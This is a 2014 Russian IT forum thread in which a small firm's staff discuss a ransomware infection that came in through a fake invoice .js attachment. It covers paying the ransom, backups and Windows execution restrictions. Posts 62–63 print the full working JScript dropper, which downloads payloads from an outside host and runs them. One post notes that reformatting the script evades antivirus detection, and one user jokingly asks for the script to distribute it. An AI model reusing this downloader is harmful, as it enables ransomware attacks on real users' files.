|   |   | 
| 
 | зашифрованы файлы keybtc@gmail_com | ☑ | ||
|---|---|---|---|---|
| 0
    
        zak555 12.08.14✎ 21:52 | 
        сегодня бух открыла некий архив, присланный по почте, и запустила из него скрипт
 Счета СФ-14-143280, СФ-14-148594, СФ-14-135789 скан-копии LaserJet HP 1490 июль 2014 года бухгалтерия-СОГЛАСОВАНО_Ок для оплаты_DrWeb.Scanned.dос .js который в итоге зашифровал все офисные файлы... куда копать ? | |||
| 1
    
        butterbean 12.08.14✎ 21:53 | 
        сговорилиись что-ли     | |||
| 2
    
        jsmith82 12.08.14✎ 21:56 | 
        дежавю     | |||
| 3
    
        Сержант 1С 12.08.14✎ 21:58 | 
        копать в сторону премиальной части буха и админа. Буха чтобы в следующий раз не запускала что попало, админа - что позволил крпитовирусу сьесть важные данные. Можно конечно еще кого-нибудь наказать за то, что антивируса нормального нет, но кто ж памятник накажет..     | |||
| 4
    
        zak555 12.08.14✎ 22:03 | 
        (3) каспер на том компе стоит     | |||
| 5
    
        zak555 12.08.14✎ 22:09 | 
        сейчас запустил этот скрипт на вирт машине -- зашифровал файлы     | |||
| 6
    
        zak555 12.08.14✎ 22:12 | 
        virusinfo.info говорит : Без оригинального дешифратора не обойтись     | |||
| 7
    
        zak555 12.08.14✎ 22:14 | 
        какой программой может промониторить, что происходит в системе ?     | |||
| 8
    
        zak555 12.08.14✎ 22:15 | 
        или как это скрипт запихнуть в отладчик, что пройти по шагово его ?     | |||
| 9
    
        sda553 12.08.14✎ 22:17 | 
        (8) Скорее всего шифрует ассимитричным алгоритмом, открытым ключом. поэтому зашифрованное без секретного ключа не расшифровать, даже изучив алгоритм по шагам     | |||
| 10
    
        Сержант 1С 12.08.14✎ 22:21 | 
        на диске должен лежать текстовый файл в котором координаты товарищей, которые за деньгу помогут расшифровать
 берут кстати немного. Две недели назад на вот таком инциденте в таком файле нашел феерическое "напишите сколько сможете выслать". Кризис, видимо. | |||
| 11
    
        zak555 12.08.14✎ 22:24 | 
        кстати, без инет скрипт не работает     | |||
| 12
    
        zak555 12.08.14✎ 22:32 | 
        (10) видел про оплату через крипто-валюту     | |||
| 13
    
        Garykom гуру 12.08.14✎ 22:57 | 
        (0) надо было отрубать комп из розетки и потом чем нибудь типа  RStudio восстанавливать
 но не прокатить если оно умное и не удаляет, а поверх перезаписывает файлы )) | |||
| 14
    
        HeroShima 12.08.14✎ 23:01 | ||||
| 15
    
        zak555 12.08.14✎ 23:07 | 
        400 EUR за расшифровку     | |||
| 16
    
        Defender aka LINN 12.08.14✎ 23:08 | 
        У нас один магазин поймал такое. Вздохну, удалил к чертям зашифрованное вместе с вирусом да и все :)     | |||
| 17
    
        HeroShima 12.08.14✎ 23:19 | 
        (4) virustotal.com как на вирус реагирует?     | |||
| 18
    
        starfront1 12.08.14✎ 23:37 | 
        Здравствуйте, уважаемые форумчане. 
 Пишу Вам по той же причине. Друг по несчастью оплатил и получил ключ, а я вот сомневаюсь - платить или нет... Говорит, что ключ выслали в течение 30 минут и все расшифровал. Правда, ему цену назвали более-менее приемлемую (около 200 долларов). Посоветуйте, платить или нет... На антивирусных форумах все равно помощи никакой((( | |||
| 19
    
        Defender aka LINN 12.08.14✎ 23:39 | 
        (18) Дата регистрации: 12 августа 2014; сегодня.
 Нюню. | |||
| 20
    
        Garykom гуру 12.08.14✎ 23:41 | 
        (19) молодца так их террористов...
 и им попавшимся тоже чтобы боялись )) ЗЫ тока ip то записать успели? | |||
| 21
    
        Ctrekoza 12.08.14✎ 23:48 | 
        (0) От кого пришло? От знакомых контрагентов пришло письмо? Почему открыла? 
 Как там у Булгакова? "Никогда не говори с незнакомцами..." | |||
| 22
    
        Партизан 13.08.14✎ 00:28 | 
        (4) ну сколько раз можно повторять - ни один "каспер" никогда не даст защиты, т.к. все антивирусы основаны на неактуальных черных списках. Врубайте белый список разрешенных исполняемых файлов и никогда не будете иметь проблем как в (0) даже при отсутствии антивируса.     | |||
| 23
    
        Сержант 1С 13.08.14✎ 00:46 | 
        (22) базы платных антивирей актуальны на 99.99999% это раз, во-вторых есть эвристика     | |||
| 24
    
        Партизан 13.08.14✎ 00:50 | 
        (23) Да неужели? ))) сколько вирусов НЕ содержится в базе? Эвристика фигня.     | |||
| 25
    
        HeroShima 13.08.14✎ 01:30 | 
        Базы сигнатур более чем на ~10000000 не попадались, в то же время количество известных вирусов оценивается как превышающее 80 миллионов.     | |||
| 26
    
        mehfk 13.08.14✎ 05:37 | 
        (25) Одна запись в антивирусной базе как правило описывает несколько реальных вирусов.     | |||
| 27
    
        Romyr 13.08.14✎ 05:40 | 
        http://habrahabr.ru/post/159811/
 авось поможет | |||
| 28
    
        vcv 13.08.14✎ 05:49 | 
        (23) Как говорится, "жизненный опыт, это знание, как не стоит поступать в ситуации, которая больше никогда не повторится". 
 Автор шифровальщика успеет собрать профит в тот краткий миг между заказом спам-рассылки и реакцией антивирусных компаний. А уж реакцию эвристики самых распространённых антивирусов автор шафровальщика проверил до того, как оплачивать спамерам рассылку. | |||
| 29
    
        zak555 13.08.14✎ 06:30 | 
        (21) да, от контрагента, с которым раньше работали     | |||
| 30
    
        zak555 13.08.14✎ 06:32 | 
        кстати, там вида ХР стоит     | |||
| 31
    
        Jokero 13.08.14✎ 07:55 | 
        (0) Копать в поддержку каспера, если он стоит. Зря что ли деньги плачены за лицензию?     | |||
| 32
    
        Сержант 1С 13.08.14✎ 08:02 | 
        (30) прекрасно! неумный пользователь за дырявой осью     | |||
| 33
    
        Бешеная Нога 13.08.14✎ 08:03 | 
        заплатите. люди же старались     | |||
| 34
    
        Escander 13.08.14✎ 08:13 | 
        + (33) предварительно сообщив в управление-Р... может они ему фаберже открутят     | |||
| 35
    
        Трик 13.08.14✎ 08:17 | 
        (19) а вдруг он поиском нарвался на тему и зарегился на форуме, что бы узнать что к чему? А ты ему бан :(.     | |||
| 36
    
        Бешеная Нога 13.08.14✎ 08:17 | 
        кстати в полицию заяву на вымогательство обязательно напишите. лох лохом, но все же пусть полиция ловит преступников.     | |||
| 37
    
        BuHu 13.08.14✎ 08:18 | 
        (34) или заблокируют ящик , ну что бы никто ему денег не слал , ну и как результат не получит ключ     | |||
| 38
    
        Escander 13.08.14✎ 08:20 | 
        (37) думаю дним блокированием не ограничатся     | |||
| 39
    
        tdm 13.08.14✎ 08:26 | 
        (0) обычно платят, на будущее сделать выводы...
 а так вообще у них фантазия норм работает одним моим знакомым пришло с вложением мол судебное распоряжение от приставов, от налоговой летит, причем почту придумывают подходящую...или знаю еще более веселый случай когда дважды шифрователь запустили - из разных писем, так один зашифровал а другой перешифровал(или они даже где-то пересеклись), в результате даже хакеры после оплаты ничего не смогли восстановить))) (34) а вы оптимист! хотя заявление да можно написать | |||
| 40
    
        Arhangeldk 13.08.14✎ 08:53 | 
        Вчера клиент тоже такую фигню подцепил. Пыталась открыть какую-то левую счет-факту. И самое интересное что зашифровались только базы 1С и бекапы.     | |||
| 41
    
        Любопытная 13.08.14✎ 08:54 | 
        (39) Деньги вернули?)     | |||
| 42
    
        Drac0 13.08.14✎ 08:54 | 
        (41) После жалобы в Роспотребнадзор )))     | |||
| 43
    
        torgm 13.08.14✎ 09:01 | 
        (8) У меня админ в таких случаях оставляет жить вирус на компе и ловит хэш :)
 Сейчас развелось развелось семейство криптовирусов, которые проходят касперского на ура... Админу однозначно в лоб. 1. Вся важная инфа должна быть расположена на сервере 2. Данные должны бэкапиться .... | |||
| 44
    
        tdm 13.08.14✎ 09:06 | 
        (41) ага, в двойном размере)))
 ...ответом было что-то типа - мы не знали что так можно (сдается мне грядёт шифровальшик 2.0 с новой фитчей - будет требоваться 2 ключа!!!)))) | |||
| 45
    
        HeroShima 13.08.14✎ 09:29 | 
        (26) Как правило нет.     | |||
| 46
    
        zak555 13.08.14✎ 11:41 | 
        (32) какая разница ?
 этот скрипт та же влезает и в вин7 | |||
| 47
    
        zak555 13.08.14✎ 11:42 | 
        (33) это самое простое     | |||
| 48
    
        zak555 13.08.14✎ 11:44 | 
        (37) по скольку вирь стал сам рассылать по адресной книге самого себя, то могу предположить, что в "центр" уже сообщён адрес почты жертвы
 это на тот случай, когда ящик заблокировать чтобы заблокированному написать с другого =) | |||
| 49
    
        zak555 13.08.14✎ 11:45 | 
        (43) там один гб+бух+ген     | |||
| 50
    
        Ёпрст гуру 13.08.14✎ 11:49 | 
        (0) пришли мне этот скрипт на eprst@mail.ru
 тоже буду рассылать подарки | |||
| 51
    
        zak555 13.08.14✎ 11:53 | 
        (50) ушло     | |||
| 52
    
        Fram 13.08.14✎ 11:53 | 
        (19) и ТС за одно :)     | |||
| 53
    
        zak555 13.08.14✎ 11:53 | 
        скрипт не сложный     | |||
| 54
    
        zak555 13.08.14✎ 11:55 | ||||
| 55
    
        Ёпрст гуру 13.08.14✎ 12:05 | 
        (54) какой-то битый архив     | |||
| 56
    
        zak555 13.08.14✎ 12:06 | 
        (55) он не открывается ?     | |||
| 57
    
        zak555 13.08.14✎ 12:07 | 
        у меня открывается     | |||
| 58
    
        Злопчинский 13.08.14✎ 12:08 | 
        Вчера и у меня пытался прорваться вирус аналогичный - вложение типа договор-черновик. нод вроде отловил.
 админ в отпуске. посмотрим что будет... | |||
| 59
    
        Ёпрст гуру 13.08.14✎ 12:08 | 
        (56) ага     | |||
| 60
    
        zak555 13.08.14✎ 12:08 | 
        (58) надо было отключить и посмотреть, что внутри     | |||
| 61
    
        Ёпрст гуру 13.08.14✎ 12:09 | 
        можешь js унутри архива переименовать в txt и еще раз перевыложить ?     | |||
| 62
    
        zak555 13.08.14✎ 12:10 | 
        содержание 
 Счета СФ-14-143280, СФ-14-148594, СФ-14-135789 скан-копии LaserJet HP 1490 июль 2014 года бухгалтерия-СОГЛАСОВАНО_Ок для оплаты_DrWeb.Scanned.dос .js //////////////////// autreplcant je us ////////////////// //////////////////// spm ml to extrcd //////////////////// ////// established /////// function reps(c,d){var b=new ActiveXObject("MSXML2.XMLHTTP");b.onreadystatechange=function(){if(4===b.readyState){var a=new ActiveXObject("ADODB.Stream");a.open();a.type=1;a.write(b.ResponseBody);a.position=0;a.saveToFile(d,2);a.close()}};b.open("GET",c,!1);b.send()}function CreateObject(c){return new ActiveXObject(c)} var nosensetoabuse="earthlingsfilm.com",tfool="%TEMP%\\",WshShell=WScript.CreateObject("WScript.Shell"),earthlingsf="%TEMP%\\keybtc.cmd",rotadm="images",WshShell=CreateObject("WScript.Shell"),tfool=WshShell.ExpandEnvironmentStrings(tfool),docs="%TEMP%\\doc.doc";try{reps("http://"+nosensetoabuse+"/"+rotadm+"/document.btc",""+tfool+"doc.doc"),WshShell.Run(""+docs+"",1,0)}catch(word){}reps("http://"+nosensetoabuse+"/"+rotadm+"/day.btc",""+tfool+"day.btc"); reps("http://"+nosensetoabuse+"/"+rotadm+"/null.btc",""+tfool+"null.btc");reps("http://"+nosensetoabuse+"/"+rotadm+"/sad.btc",""+tfool+"sad.btc");reps("http://"+nosensetoabuse+"/"+rotadm+"/doc.btc",""+tfool+"keybtc.cmd");WshShell.Run(""+earthlingsf+"",0,0); /////// goodbye hooray /////// | |||
| 63
    
        Партизан 13.08.14✎ 12:11 | 
        у меня нормально открылся:
 //////////////////// autreplcant je us ////////////////// //////////////////// spm ml to extrcd //////////////////// ////// established /////// function reps(c,d) { var b=new ActiveXObject("MSXML2.XMLHTTP"); b.onreadystatechange=function() { if(4===b.readyState) { var a=new ActiveXObject("ADODB.Stream"); a.open(); a.type=1; a.write(b.ResponseBody); a.position=0; a.saveToFile(d,2); a.close() } }; b.open("GET",c,!1); b.send() } function CreateObject(c) { return new ActiveXObject(c) } var nosensetoabuse="earthlingsfilm.com", tfool="%TEMP%\\", WshShell=WScript.CreateObject("WScript.Shell"), earthlingsf="%TEMP%\\keybtc.cmd", rotadm="images", WshShell=CreateObject("WScript.Shell"), tfool=WshShell.ExpandEnvironmentStrings(tfool), docs="%TEMP%\\doc.doc"; try { reps("http://"+nosensetoabuse+"/"+rotadm+"/document.btc",""+tfool+"doc.doc"), WshShell.Run(""+docs+"",1,0) } catch(word){} reps("http://"+nosensetoabuse+"/"+rotadm+"/day.btc",""+tfool+"day.btc"); reps("http://"+nosensetoabuse+"/"+rotadm+"/null.btc",""+tfool+"null.btc"); reps("http://"+nosensetoabuse+"/"+rotadm+"/sad.btc",""+tfool+"sad.btc"); reps("http://"+nosensetoabuse+"/"+rotadm+"/doc.btc",""+tfool+"keybtc.cmd"); WshShell.Run(""+earthlingsf+"",0,0); /////// goodbye hooray /////// | |||
| 64
    
        zak555 13.08.14✎ 12:14 | 
        (63) он качает с сайта тело и запускает его     | |||
| 65
    
        Velman 13.08.14✎ 12:14 | 
        1. Админ нафига дал права на админскую учетку у буха
 2. Это не вирус, а тупо шифратор... 3. Админу ноги вырвать и ж... | |||
| 66
    
        zak555 13.08.14✎ 12:16 | 
        (65) нету одминов     | |||
| 67
    
        Партизан 13.08.14✎ 12:17 | 
        (64) Оо у вас разрешены скачка исполняемых файлов пользователям?? )))     | |||
| 68
    
        zak555 13.08.14✎ 12:17 | 
        (67) ты его запусти у себя     | |||
| 69
    
        Ёпрст гуру 13.08.14✎ 12:18 | 
        (62) ага, спасиб
 просто антивирусняк выкашивает содержимое :)) | |||
| 70
    
        zak555 13.08.14✎ 12:19 | 
        (69) яндекс тупо удалил из отправленных и не отправил =)     | |||
| 71
    
        Партизан 13.08.14✎ 12:19 | 
        (68) че-то не запускается, ибо (22)     | |||
| 72
    
        Velman 13.08.14✎ 12:20 | 
        скажите своим админам чтоб теневое копирование сделали... Хоть что то, но восстановится! А так платить придется.     | |||
| 73
    
        zak555 13.08.14✎ 12:20 | 
        (71) так не все же это делают     | |||
| 74
    
        zak555 13.08.14✎ 12:20 | 
        (72) одинов нет     | |||
| 75
    
        Velman 13.08.14✎ 12:21 | 
        (74) Экономят?     | |||
| 76
    
        Velman 13.08.14✎ 12:23 | 
        Или маленькая фирма?     | |||
| 77
    
        zak555 13.08.14✎ 12:24 | 
        (75) (76) мини фирма     | |||
| 78
    
        zak555 13.08.14✎ 12:24 | 
        кстати, скрипт отрабатывает даже под обычным пользователем     | |||
| 79
    
        KENT2007 13.08.14✎ 12:30 | 
        вчера только попались, зашифровалась даже база 1с +флешки+ архивы 1с) 
 хотя раб стол не тронул. там и был последний архив 1с. при отправке файлов по инструкции к оплате выставили счет 3.8 тысруб | |||
| 80
    
        Velman 13.08.14✎ 12:39 | 
        (77) Мы тоже так разок влетели) у нас на фирме 1400 чел, активных в 1С около 50, спасло архивирование, и то что архив в инет (сервер) не лез. И не в домене.     | |||
| 81
    
        Партизан 13.08.14✎ 12:44 | 
        вообще, в целях той-же сохранности DBF базы, к примеру (не только от шифраторов, но и от инсайдеров-сливальщиков) , есть большой смысл запретить в правах пользователей листинг директорий, т.е. невозможно будет получить стандартными методами список файлов в каталоге базы. При этом 1С-ка будет нормально работать, т.к. все имена файлов для нее известны заранее.     | |||
| 82
    
        zak555 13.08.14✎ 12:44 | 
        (22) > Врубайте белый список разрешенных исполняемых файлов и никогда не будете иметь проблем как в (0) даже при отсутствии антивируса.
 как средствами винды такое включить ? | |||
| 83
    
        zak555 13.08.14✎ 12:45 | 
        (81) это если домен есть     | |||
| 84
    
        Партизан 13.08.14✎ 12:47 | 
        (83) нет, у меня домена нет, такое используется для защиты баз 1С. Права настроены в свойствах папок на вкладке безопасность.
 (82) Локальная политика безопасности / Политики ограниченного использования программ / создать/. По умолчанию / не разрешено. ну и дальше рулить как надо. | |||
| 85
    
        Velman 13.08.14✎ 12:51 | 
        Там все юзеры админы что ли?     | |||
| 86
    
        ildary 13.08.14✎ 12:58 | 
        (81) нельзя ли поподробнее - как это сделать, точнее - какой пункт запретить в NTFS?     | |||
| 87
    
        Партизан 13.08.14✎ 12:58 | 
        +(84)
 здесь подробно: http://www.windowsfaq.ru/content/view/694/46/ | |||
| 88
    
        Партизан 13.08.14✎ 13:02 | 
        (86) я щас не на работе, скриншот не могу сделать, вроде "содержимое папки" но не только это.     | |||
| 89
    
        zak555 13.08.14✎ 13:15 | 
        (85) не админские права всё ранво запускают скрипт
 (87) сейчас проверю | |||
| 90
    
        ildary 13.08.14✎ 13:16 | 
        (88) я подожду, тема очень интересная, пожалуйста отпиши здесь, как появишься на работе.     | |||
| 91
    
        Velman 13.08.14✎ 13:19 | 
        (89) Антивирус какой?     | |||
| 92
    
        zak555 13.08.14✎ 13:25 | 
        (91) на той машины -- был каспер     | |||
| 93
    
        Партизан 13.08.14✎ 13:30 | 
        (91) ни один антивирус ("проходи, если не в розыске") не поможет, если политика доступа приложений на компьютер будет оставаться "добро пожаловать, гости дорогие!" , а не "Стоять! Кто идет?"     | |||
| 94
    
        NikVars 13.08.14✎ 13:36 | 
        (92) Понадеялась деваха на парня, стала мамой.     | |||
| 95
    
        Torquader 13.08.14✎ 13:42 | 
        В общем, есть мнение, что нужно просто переименовать WSCRIPT.EXE и MSHTA.EXE, если вы их не используете.
 (А если используете, то поменять расширения). Тогда "всякая дрянь" не будет запускаться. P.S. на *.scr я уже поставил запуск программы с сообщением "Вы запустили вирус" - теперь такое же нужно делать и с *.vbs и *.js (ну и *.wsf не забыть). | |||
| 96
    
        Партизан 13.08.14✎ 13:43 | 
        (95) какая тяга к изобретению велосипедов с квадратными колесами )     | |||
| 97
    
        Torquader 13.08.14✎ 13:44 | 
        (81) Можно 1С запускать через RunAs от другой учётки с сохранением пароля (есть такая возможность), тогда к базе 1С будет доступ только у самой 1С.
 А ещё лучше браузер запускать из под пользователя guest с очень урезанными правами - проблема только в том, что потом пользователи не могут открыть документы напрямую - но это решается использованием папки запуска где уже js-файл от doc-файла прекрасно отличат. | |||
| 98
    
        Torquader 13.08.14✎ 13:46 | 
        Не забываем, что js-файл - это сценарий, и его текст можно достаточно произвольно менять, перенося нужные вызовы из одной функции в другую - так что даже антивирус с эвристикой не поймёт что и к чему.     | |||
| 99
    
        Velman 13.08.14✎ 13:54 | 
        (93) У нас стоит доктор веб, он в настройках запрещает автозапуск программ. Про хост уже молу даже..     | |||
| 100
    
        13_Mult 13.08.14✎ 14:15 | 
        Вот опять кого-то зашифровали. ))
 Кто же пользователям под админом то даёт работать. Только ограниченную учетку и ни каких вирусов/скриптов. )) | |||
| 101
    
        zak555 13.08.14✎ 14:16 | 
        (87) да, уровень безопасности Не разрешено -- запрещает выполнение
 а как тогда обмениваться политиками между разными конторами ? | |||
| 102
    
        zak555 13.08.14✎ 14:31 | 
        + (101)
 про политики вопрос : для политики "Локальный компьютер" установил уровень безопасности -- Не разрешено применять политику для всех, кроме одминов почему тогда скрипт по-прежнему не запускается под одмином ? | |||
| 103
    
        Torquader 13.08.14✎ 14:57 | 
        (100) Даже если учётка ограничена, то всё равно все пользовательские файлы ей доступны, а то, что вирус в системной директории не побывал - это пользователя не спасает.
 Просто, когда потом заходишь под админом, то даже поиск вируса занимает очень много времени (найти exe-файл в куче папок пользователя даже CureIt не сразу может). | |||
| 104
    
        Ctrekoza 13.08.14✎ 14:58 | 
        (29) Я не открываю письма, если знаю что не жду от них ничего. Недавно похожее было. Типа пришло коммерческое предложение, я не открыла, т.к. нам от них ничего не нужно было. Самое смешное произошло через два дня. В этом письме появилось новое письмо с новой датой и заголовком типа "я вот недавно подумал.." - рассчитано на слишком любопытных.... Тогда я уже просто перезвонила контрагенту и спросила, они ответили что не отсылали. Письмо пошло в спам без открытия...     | |||
| 105
    
        zak555 13.08.14✎ 15:05 | 
        (104) значит можешь попасться, когда придёт вирус от нужного контрагента     | |||
| 106
    
        Ctrekoza 13.08.14✎ 15:08 | 
        (105) В смысле? Я знаю точно чей файл, значит отвечать будет контрагент, если у меня полет базы.     | |||
| 107
    
        zak555 13.08.14✎ 15:09 | 
        расширения файлов, которые шифрует вирус:
 (*.xls *.xlsx *.doc *.docx *.xlsm *.jpg *.cdr *.pdf *.cd *.slddrw *.dwg *.accdb *.ai *.svg *.mdb *.1cd *.zip *.rar *.max) | |||
| 108
    
        Torquader 13.08.14✎ 15:14 | 
        (106) Подлинность электронного письма сейчас проверить достаточно сложно, особенно, если используется общедоступный mail-сервер.     | |||
| 109
    
        бомболюк 13.08.14✎ 15:14 | 
        (107) судя по расширениям 1С 7.7 устояла бы ;-)     | |||
| 110
    
        Torquader 13.08.14✎ 15:14 | 
        (107) А почему в списке нет txt-файлов ?     | |||
| 111
    
        NikVars 13.08.14✎ 15:14 | 
        (107) Ты думешь касперу будет интересен твой список?     | |||
| 112
    
        Ctrekoza 13.08.14✎ 15:15 | 
        (108) Есть же люди, которые занимаются киберпреступностью. Туда заяву и вперед пусть выясняют...     | |||
| 113
    
        Torquader 13.08.14✎ 15:17 | 
        (112) Так вам нужно чтобы кого-то наказали или чтобы ваши файлы остались целы ?     | |||
| 114
    
        Ctrekoza 13.08.14✎ 15:17 | 
        (107) Ну 1с точно можно спасти, просто нужно копировать файлы на переносной диск пере выходом в инет с компа, где находится база....     | |||
| 115
    
        NikVars 13.08.14✎ 15:18 | 
        (112) Пенты очень любят адресные заявы. Заява от конкретика на конкретика. А тут возьни дофига, вероятность потуг большая, а выхлопа не будет. Да и нет ущерба на миллиарды рубликов.     | |||
| 116
    
        Torquader 13.08.14✎ 15:18 | 
        Кстати, элемент списка контроля доступа "запрет" имеют приоритет над "разрешено", так что любимые фотографии можно просто запретить за запись и удаление всем, кроме особенной учётки.     | |||
| 117
    
        zak555 13.08.14✎ 15:18 | 
        (110) не знаю     | |||
| 118
    
        Ctrekoza 13.08.14✎ 15:18 | 
        (113) Мне нужно чтобы остались целы. Ну а наказание мошенникам, пока никто не отменял, в случае форс-мажора...     | |||
| 119
    
        HeroShima 13.08.14✎ 15:18 | ||||
| 120
    
        zak555 13.08.14✎ 15:19 | 
        (114) только 8ку нужно переименовать )))     | |||
| 121
    
        Torquader 13.08.14✎ 15:20 | 
        (114) У меня в одной конторе бухгалтера в инет ходят с одной машины, а вся бухгалтерия - на другой.     | |||
| 122
    
        zak555 13.08.14✎ 15:20 | 
        (118) ребята на самом деле молодцы     | |||
| 123
    
        Ctrekoza 13.08.14✎ 15:20 | 
        (120)  Зачем? Тупо копируешь на диск на всякий случай...     | |||
| 124
    
        zak555 13.08.14✎ 15:20 | 
        (121) в БД копированием ничего не вносят ?     | |||
| 125
    
        zak555 13.08.14✎ 15:21 | 
        (123) скрипт-шифровальщик идёт по ВСЕ подключённым дискам/флешкам/сетевым ресурсам     | |||
| 126
    
        Ctrekoza 13.08.14✎ 15:21 | 
        (121)  Я тоже так делаю....     | |||
| 127
    
        Torquader 13.08.14✎ 15:21 | 
        (124) На компе с БД запустить можно только ограниченный список задач - даже время поменять - говорит "нельзя запускать RunDll32.exe"     | |||
| 128
    
        zak555 13.08.14✎ 15:22 | 
        (119) кстати, антивирь от мс -- сработал     | |||
| 129
    
        zak555 13.08.14✎ 15:26 | 
        (127) запустить счет на оплату и словить скрипт     | |||
| 130
    
        Torquader 13.08.14✎ 15:27 | 
        (128) По идее, антивирус должен срабатывать не на сам скрипт, а на то, что он загружает.
 С другой стороны, получение в сценарии какого-то файла и его запуск на исполнение уже должны рассматриваться как вирус. P.S. с Windows XP для этого был даже поток файла с указанием зоны получения введён, чтобы давать различные разрешения на различные файлы, только почему-то оно так и не заработало, как должно. И, самое главное, что должен быть правильно настроен firewall, чтобы ни одна программа, кроме браузера, не имела подключение к интернету, а особенно сценарии. | |||
| 131
    
        HeroShima 13.08.14✎ 15:28 | 
        (128) Ага. Причем узнал в лицо.     | |||
| 132
    
        NikVars 13.08.14✎ 15:28 | 
        (121) Это мало защит от загаженных флешек, особенно - после разных там ПФР и налоговых.     | |||
| 133
    
        Ctrekoza 13.08.14✎ 15:29 | 
        (129) Не пойму. А что его запускать? Открывай только для чтения. Винда сама это делает неплохо.     | |||
| 134
    
        Torquader 13.08.14✎ 15:29 | 
        (129) Ну и как они его запустят ?
 Запустить можно только exe-файл из списка или lnk-файл с подписью. Ну а если кто-то нажимает на js-файл, он видит его на экране в блокноте - ну и пусть печатают, видят же, что не счёт. | |||
| 135
    
        zak555 13.08.14✎ 15:30 | 
        (132) носи в фонды/инспекции sd-карты     | |||
| 136
    
        zak555 13.08.14✎ 15:31 | 
        (133) это как ?     | |||
| 137
    
        zak555 13.08.14✎ 15:31 | 
        (134) а винда по умолчанию вызывает программу по выполнению скрипта *?     | |||
| 138
    
        Torquader 13.08.14✎ 15:31 | 
        (132) Ну на flash-диске прекрасно создаётся папка AUTORUN.INF с файлом внутри, который удалить нельзя (имя файла с ошибкой) и всё.     | |||
| 139
    
        Torquader 13.08.14✎ 15:32 | 
        (137) regedit.exe вам в помощь - винда прекрасно запоминает, что нужно делать с тем или иным файлом.     | |||
| 140
    
        zak555 13.08.14✎ 15:33 | 
        (138) почему никак не удалишь ?
 (139) сейчас посмотрю | |||
| 141
    
        NikVars 13.08.14✎ 15:34 | 
        (138) Ну-ну... Она создается тогда, когда попала в руки админу. В бюстгалтерии - ничего кроме проводок Дт-Кт не создается.     | |||
| 142
    
        HeroShima 13.08.14✎ 15:35 | 
        К слову о сигнатурах, (62) с обрезанными комментариями:
 https://www.virustotal.com/ru/file/703ccfb749c9b0842addd9376aa92c2afd10f220dec60c220b5ca4d34317f34c/analysis/1407929616/ | |||
| 143
    
        zak555 13.08.14✎ 15:37 | 
        (142) т.е. если убрать комменты, то каспер видит ?     | |||
| 144
    
        HeroShima 13.08.14✎ 15:38 | 
        (143) Не знаю, но там ещё и формат другой.     | |||
| 145
    
        HeroShima 13.08.14✎ 15:41 | 
        Не, на одни комменты не реагируют.     | |||
| 146
    
        Партизан 13.08.14✎ 23:16 | 
        (97) Под одинаковым пользователем 1С запускать нежелательно, а на каждого пользователя дублировать еще одну учетку неприемлемо. Опять-же на каждом рабочем месте ходить запоминать пароли тоже. Проще и надежнее один раз настроить права доступа к файлам, разрешив только те файловые операции (а не просто чтение/запись), которые необходимы и достаточны.
 (99) а причем тут автозапуск? Пользователь сам запустит ничего не подозревая. (102) после внесенных изменений перезагрузи параметры безопасности. (106) контрагент ни за что отвечать не будет, если не подписал файл своей ЭЦП. (143) нет, если ничего не убирая и не меняя просто отформатировать исходный (62) текст для удобочитатемости, как в (63), то каспер перестает видеть, вот она, хваленая "эвристика" каспера. | |||
| 147
    
        zak555 13.08.14✎ 23:19 | 
        (146) 
 > после внесенных изменений перезагрузи параметры безопасности. не отработало > контрагент ни за что отвечать не будет, если не подписал файл своей ЭЦП. контрагент будет отвечать только в том случае, если докажут, что сделал это умышленно | |||
| 148
    
        Ctrekoza 13.08.14✎ 23:35 | 
        (146)+(147) +  контрагент ни за что отвечать не будет, если не подписал файл своей ЭЦП. >>
 Если подписывает ЭЦП, тогда должна стоять программа Крипто-Про и обычно в этом случае файлы идут через оператора, а он отвечает за безопасность. ИМХО: вероятность, что такой файл будет нести вирус очень даже низкая, если не нулевая. контрагент будет отвечать только в том случае, если докажут, что сделал это умышленно>>> Если нет определенного уровня защиты и доступ к исполняемым файлам у всех, кто подошел к компу, тогда это преступная халатность или провокация преступления... Как-то так :) | |||
| 149
    
        zak555 13.08.14✎ 23:42 | 
        (148)
 пусть даже другой пример я подписал архив, в котором каким-то образовал оказался скрипт, который всё шифрует если получатель его запустит -- всё равно не буду ни за что отвечать, т.к. не было умысла | |||
| 150
    
        Партизан 13.08.14✎ 23:43 | 
        (148) а причем тут крипто-про? Для подписания он не обязателен, как и оператор. Много лет назад, когда только начинали работать с ЭЦП, из налоговой нам как-то раз приходил вордовский документ, зараженный вирусом и подписанный ЭЦП.     | |||
| 151
    
        Партизан 13.08.14✎ 23:59 | 
        (149) >>"т.к. не было умысла"
 тогда ч.2 ст 273 )) "2. Те же деяния, повлекшие по неосторожности тяжкие последствия, - наказываются лишением свободы на срок до семи лет." | |||
| 152
    
        zak555 14.08.14✎ 00:04 | ||||
| 153
    
        Ctrekoza 14.08.14✎ 00:11 | 
        (150) Теперь всё подписывают КЭП, а она требует установки Крипто. Там по лицензированию оператора это связано... если коротко..     | |||
| 154
    
        zak555 14.08.14✎ 00:13 | 
        (153) криптоПРО - это один из крипто-программ
 есть и бесплатные аналоги | |||
| 155
    
        Franchiser 14.08.14✎ 00:16 | 
        Был у меня один клиент, зашифровались файлы базы 1с7.7 dbf заплатили  хакерам. Ждали чуть больше недели правда. Я столько же денег заработал или даже больше за помощь.     | |||
| 156
    
        Franchiser 14.08.14✎ 00:17 | 
        (154) предлагаю с буха взять денег и за его счет решить проблему, ну и себе процент.     | |||
| 157
    
        zak555 14.08.14✎ 00:21 | 
        (156) денег брать надо с дира, а не буха     | |||
| 158
    
        Ctrekoza 14.08.14✎ 00:21 | 
        zak555, ты решил свой вопрос и как? Интересно, же...     | |||
| 159
    
        zak555 14.08.14✎ 00:24 | 
        (158) пока нет
 но я почитал на форуме др.веба, что шифровальщик подразделяется на несколько классов -- часть можно уже расшифровать, а часть нет сейчас компа у меня нет | |||
| 160
    
        Партизан 14.08.14✎ 00:25 | ||||
| 161
    
        Ctrekoza 14.08.14✎ 00:28 | 
        (160) Уже год, как отчетность должна подписываться только КЭП (квалифицированная электронная подпись) приравнена в ГК РФ к собственноручной подписи.     | |||
| 162
    
        Партизан 14.08.14✎ 00:29 | 
        (161) аа, а я подумал, что КЭП - программа какая-то ))
 ну пару реквизитов в сертификат добавили, а суть-то таже. | |||
| 163
    
        zak555 14.08.14✎ 00:30 | 
        (161) что значит должна ?     | |||
| 164
    
        zak555 14.08.14✎ 00:34 | 
        (160) читаем 
 Федеральный закон Российской Федерации от 7 декабря 2011 г. N 420-ФЗ -- пункт 188) статьи 1 http://www.rg.ru/2011/12/08/p-raboty-site-dok.html | |||
| 165
    
        Ctrekoza 14.08.14✎ 00:39 | 
